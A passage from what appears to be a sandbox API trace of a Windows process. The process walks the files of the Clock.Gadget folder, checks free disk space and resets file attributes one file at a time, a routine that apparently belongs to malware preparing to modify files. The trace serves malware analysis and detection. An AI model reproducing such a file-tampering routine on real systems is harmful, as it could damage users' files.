nFileSizeLow=0xbc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_bkg.png", cAlternateFileName="")) returned 1 [0131.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fee3c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7fee3c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3afbd1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_orange.png", cAlternateFileName="")) returned 1 [0131.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fee3c1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7fee3c1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3afbd1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_ring_docked.png", cAlternateFileName="")) returned 1 [0131.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8014520, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8014520, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single.png", cAlternateFileName="")) returned 1 [0131.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb803a67f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb803a67f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg.png", cAlternateFileName="")) returned 1 [0131.585] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb803a67f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb803a67f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x12a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg_orange.png", cAlternateFileName="")) returned 1 [0131.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb80607de, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb80607de, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xaa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_orange.png", cAlternateFileName="")) returned 1 [0131.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb80607de, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb80607de, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3c5297c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="corner.png", cAlternateFileName="")) returned 1 [0131.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3c78adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl-hot.png", cAlternateFileName="")) returned 1 [0131.586] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f2fce6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f2fce6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3c78adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl.png", cAlternateFileName="")) returned 1 [0131.587] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f2fce6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f2fce6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb40ef41c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0x0, dwReserved1=0x0, cFileName="month.png", cAlternateFileName="")) returned 1 [0131.587] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f2fce6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f2fce6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb411557c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-desk.png", cAlternateFileName="")) returned 1 [0131.587] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb411557c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-dock.png", cAlternateFileName="")) returned 1 [0131.587] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb411557c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-dock.png", cAlternateFileName="")) returned 0 [0131.587] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.588] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.588] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.588] CoTaskMemFree (pv=0x4e1c10) [0131.588] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.589] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ccadbf, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9ccadbf, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44a767c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0131.589] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.589] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44cd7dc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb44cd7dc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb44cd7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0131.589] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818f91fe, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818f91fe, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0131.590] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9cf0f1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9cf0f1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb640b89c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0131.590] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.590] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.591] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0131.602] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0131.605] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0131.628] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0131.635] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0131.643] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0131.645] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x17c1eb80, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17c1eb80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.646] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ccadbf, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9ccadbf, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44a767c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0131.646] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.646] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44cd7dc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb44cd7dc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb44cd7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0131.647] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818f91fe, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818f91fe, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0131.647] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9cf0f1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9cf0f1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb640b89c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0131.647] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9cf0f1e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9cf0f1e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb640b89c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0131.647] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.648] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.648] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.648] CoTaskMemFree (pv=0x4e1c10) [0131.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.html", cAlternateFileName="")) returned 1 [0131.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0131.650] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0131.651] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0131.651] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0131.652] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.652] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.653] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.661] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html", dwFileAttributes=0x80) returned 0 [0131.665] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.671] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0131.674] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.690] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0131.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x17c6ae40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17c90fa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.html", cAlternateFileName="")) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0131.693] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0131.694] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, 